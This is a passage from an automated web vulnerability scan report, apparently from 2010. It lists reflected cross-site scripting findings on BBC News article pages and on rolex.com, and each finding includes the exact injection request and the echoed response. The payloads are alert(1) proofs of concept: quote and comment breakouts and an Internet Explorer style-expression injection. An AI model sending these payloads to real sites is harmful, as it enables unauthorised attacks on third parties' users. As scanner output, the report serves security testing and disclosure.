Host:   http://www.bbc.co.uk
Path:   /news/uk-12006670

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af270'-alert(1)-'f991899cdc2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-12006670?af270'-alert(1)-'f991899cdc2=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:27:59 GMT
Keep-Alive: timeout=10, max=790
Expires: Thu, 16 Dec 2010 19:27:59 GMT
Connection: close
Content-Length: 81515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527679000,
       editionToServe: 'us',
       queryString: 'af270'-alert(1)-'f991899cdc2=1',
       referrer: null,
       section: 'uk',
       sectionPath: '/UK',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12006670',
       assetType: 'story',
       uri: '/news/
...[SNIP]...

2.79. http://www.bbc.co.uk/news/uk-england-lancashire-12007100 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-england-lancashire-12007100

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8504'-alert(1)-'d41b2b2b8bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-england-lancashire-12007100?f8504'-alert(1)-'d41b2b2b8bd=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:27:56 GMT
Keep-Alive: timeout=10, max=663
Expires: Thu, 16 Dec 2010 19:27:56 GMT
Connection: close
Content-Length: 61859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527676000,
       editionToServe: 'us',
       queryString: 'f8504'-alert(1)-'d41b2b2b8bd=1',
       referrer: null,
       section: 'lancashire',
       sectionPath: '/England/Lancashire',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12007100',
       assetType:
...[SNIP]...

2.80. http://www.bbc.co.uk/news/uk-england-london-11990646 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-england-london-11990646

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ff5e'-alert(1)-'69915057a09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-england-london-11990646?9ff5e'-alert(1)-'69915057a09=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:03 GMT
Keep-Alive: timeout=10, max=710
Expires: Thu, 16 Dec 2010 19:28:03 GMT
Connection: close
Content-Length: 63813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527683000,
       editionToServe: 'us',
       queryString: '9ff5e'-alert(1)-'69915057a09=1',
       referrer: null,
       section: 'london',
       sectionPath: '/England/London',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '11990646',
       assetType: 'story',
...[SNIP]...

2.81. http://www.bbc.co.uk/news/uk-scotland-12000741 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-scotland-12000741

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd6c6'-alert(1)-'8385b3cc530 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-scotland-12000741?dd6c6'-alert(1)-'8385b3cc530=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:28:01 GMT
Keep-Alive: timeout=10, max=748
Expires: Thu, 16 Dec 2010 19:28:01 GMT
Connection: close
Content-Length: 73185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527681000,
       editionToServe: 'us',
       queryString: 'dd6c6'-alert(1)-'8385b3cc530=1',
       referrer: null,
       section: 'scotland',
       sectionPath: '/Scotland',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12000741',
       assetType: 'story',
       
...[SNIP]...

2.82. http://www.bbc.co.uk/news/world-africa-12007523 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-africa-12007523

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c1f2'-alert(1)-'269ea843804 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-africa-12007523?1c1f2'-alert(1)-'269ea843804=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:27:46 GMT
Keep-Alive: timeout=10, max=700
Expires: Thu, 16 Dec 2010 19:27:46 GMT
Connection: close
Content-Length: 63703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527666000,
       editionToServe: 'us',
       queryString: '1c1f2'-alert(1)-'269ea843804=1',
       referrer: null,
       section: 'africa',
       sectionPath: '/World/Africa',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12007523',
       assetType: 'story',

...[SNIP]...

2.83. http://www.bbc.co.uk/news/world-europe-11342247 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-europe-11342247

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cae1c'-alert(1)-'232bc5d3c98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-europe-11342247?cae1c'-alert(1)-'232bc5d3c98=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:27:54 GMT
Keep-Alive: timeout=10, max=706
Expires: Thu, 16 Dec 2010 19:27:54 GMT
Connection: close
Content-Length: 63507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527674000,
       editionToServe: 'us',
       queryString: 'cae1c'-alert(1)-'232bc5d3c98=1',
       referrer: null,
       section: 'europe',
       sectionPath: '/World/Europe',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '11342247',
       assetType: 'story',

...[SNIP]...

2.84. http://www.bbc.co.uk/news/world-europe-12011212 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-europe-12011212

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef5d9'-alert(1)-'64be3be3569 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-europe-12011212?ef5d9'-alert(1)-'64be3be3569=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:27:51 GMT
Keep-Alive: timeout=10, max=659
Expires: Thu, 16 Dec 2010 19:27:51 GMT
Connection: close
Content-Length: 57049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527671000,
       editionToServe: 'us',
       queryString: 'ef5d9'-alert(1)-'64be3be3569=1',
       referrer: null,
       section: 'europe',
       sectionPath: '/World/Europe',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12011212',
       assetType: 'story',

...[SNIP]...

2.85. http://www.bbc.co.uk/news/world-europe-12013182 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-europe-12013182

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca488'-alert(1)-'a9ed77167d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-europe-12013182?ca488'-alert(1)-'a9ed77167d5=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:27:48 GMT
Keep-Alive: timeout=10, max=744
Expires: Thu, 16 Dec 2010 19:27:48 GMT
Connection: close
Content-Length: 56127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527668000,
       editionToServe: 'us',
       queryString: 'ca488'-alert(1)-'a9ed77167d5=1',
       referrer: null,
       section: 'europe',
       sectionPath: '/World/Europe',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12013182',
       assetType: 'story',

...[SNIP]...

2.86. http://www.bbc.co.uk/news/world-middle-east-12011660 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12011660

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6c1c'-alert(1)-'483aaf41a1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-middle-east-12011660?e6c1c'-alert(1)-'483aaf41a1d=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:27:48 GMT
Keep-Alive: timeout=10, max=730
Expires: Thu, 16 Dec 2010 19:27:48 GMT
Connection: close
Content-Length: 56325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527668000,
       editionToServe: 'us',
       queryString: 'e6c1c'-alert(1)-'483aaf41a1d=1',
       referrer: null,
       section: 'middle-east',
       sectionPath: '/World/Middle East',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12011660',
       assetType:
...[SNIP]...

2.87. http://www.bbc.co.uk/news/world-south-asia-12006092 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-south-asia-12006092

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb383'-alert(1)-'7a69f6c638e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-south-asia-12006092?eb383'-alert(1)-'7a69f6c638e=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:27:51 GMT
Keep-Alive: timeout=10, max=751
Expires: Thu, 16 Dec 2010 19:27:51 GMT
Connection: close
Content-Length: 60462

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527671000,
       editionToServe: 'us',
       queryString: 'eb383'-alert(1)-'7a69f6c638e=1',
       referrer: null,
       section: 'south-asia',
       sectionPath: '/World/South Asia',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12006092',
       assetType: 's
...[SNIP]...

2.88. http://www.bbc.co.uk/news/world-us-canada-12012762 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12012762

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a445c'-alert(1)-'0562616bfd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-us-canada-12012762?a445c'-alert(1)-'0562616bfd5=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:27:35 GMT
Keep-Alive: timeout=10, max=724
Expires: Thu, 16 Dec 2010 19:27:35 GMT
Connection: close
Content-Length: 66854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527655000,
       editionToServe: 'us',
       queryString: 'a445c'-alert(1)-'0562616bfd5=1',
       referrer: null,
       section: 'us-and-canada',
       sectionPath: '/World/US and Canada',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12012762',
       assetTy
...[SNIP]...

2.89. http://www.bbc.co.uk/news/world-us-canada-12013186 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12013186

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0b70'-alert(1)-'e7f219a53bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-us-canada-12013186?d0b70'-alert(1)-'e7f219a53bf=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10139|J08781_10277; BBC-UID=843d706a56c7ddbd797feb4cd10d2edf1ab4a609204001e172f2531334d4f5250Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%205%2e2%3b%20en%2dUS%29%20AppleWebKit%2f534%2e10%20%28KHTML%2c%20like%20Gecko%29%20Chrome%2f8%2e0%2e552%2e224%20Safari%2f534%2e10; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:27:35 GMT
Keep-Alive: timeout=10, max=794
Expires: Thu, 16 Dec 2010 19:27:35 GMT
Connection: close
Content-Length: 53262

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292527655000,
       editionToServe: 'us',
       queryString: 'd0b70'-alert(1)-'e7f219a53bf=1',
       referrer: null,
       section: 'us-and-canada',
       sectionPath: '/World/US and Canada',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12013186',
       assetTy
...[SNIP]...

2.90. http://www.rolex.com/en/home [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rolex.com
Path:   /en/home

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e2b6e-->c392133693f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/home?e2b6e-->c392133693f=1 HTTP/1.1
Host: www.rolex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache,max-age=0,must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Date: Thu, 16 Dec 2010 19:34:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ViewRolex3=Flash; expires=Thu, 16-Jun-2011 19:50:26 GMT; path=/
Set-Cookie: RolexSiteID=4; expires=Wed, 16-Dec-2020 19:50:26 GMT; path=/
Set-Cookie: ASP.NET_SessionId=upj1qafosbwx1555gdrvzb45; path=/; HttpOnly
Set-Cookie: GeoLoc=234/3992/26564; expires=Wed, 16-Feb-2011 19:50:26 GMT; path=/
Content-Length: 39210


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head><meta name=
...[SNIP]...
<!-- WITBE: /en/home?e2b6e-->c392133693f=1 -->
...[SNIP]...

2.91. http://www.rolex.com/en/home [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rolex.com
Path:   /en/home

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c535"style%3d"x%3aexpression(alert(1))"49c6d6c27fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2c535"style="x:expression(alert(1))"49c6d6c27fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /en/home?2c535"style%3d"x%3aexpression(alert(1))"49c6d6c27fa=1 HTTP/1.1
Host: www.rolex.com
Accept: */*
Accept-Language: en
